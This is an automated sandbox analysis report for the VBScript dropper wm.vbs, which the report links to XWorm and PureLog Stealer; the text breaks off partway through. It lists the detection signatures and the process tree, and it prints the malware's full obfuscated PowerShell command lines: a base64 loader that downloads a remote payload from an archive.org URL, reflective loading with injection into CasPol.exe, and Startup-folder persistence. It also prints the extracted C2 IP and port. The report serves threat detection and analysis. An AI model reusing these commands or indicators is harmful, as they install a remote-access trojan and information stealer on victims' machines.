Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wm.vbs

Overview

General Information

Sample name:wm.vbs
Analysis ID:1518301
MD5:9925d6b112cc586b4c53b9ec22ac9ee3
SHA1:d3a6302d2d70999036849a9cf046ee868ba78427
SHA256:c7d27223d3eeb698eeea7eac9681158f66c0091f5fc2e8ec95c979f324227373
Tags:vbsuser-NDA0E
Infos:

Detection

PureLog Stealer, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected XWorm
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7752 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7836 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7880 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • powershell.exe (PID: 7968 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 8152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • CasPol.exe (PID: 2960 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["135.224.23.113"], "Port": "5555", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.1736234279.000001697BE10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x6a7c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x6b19:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x6c2e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x68ee:$cnc4: POST / HTTP/1.1
      0000000A.00000002.2650769165.0000000003531000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 6 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          10.2.CasPol.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            10.2.CasPol.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x6c7c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x6d19:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x6e2e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x6aee:$cnc4: POST / HTTP/1.1
            9.2.powershell.exe.1690061e580.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              9.2.powershell.exe.1690061e580.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x4e7c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x4f19:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x502e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x4cee:$cnc4: POST / HTTP/1.1
              9.2.powershell.exe.1697be10000.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 6 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\Syst
                Sigma detected: Potential PowerShell Command Line Obfuscation
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbSc
                Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbSc
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnS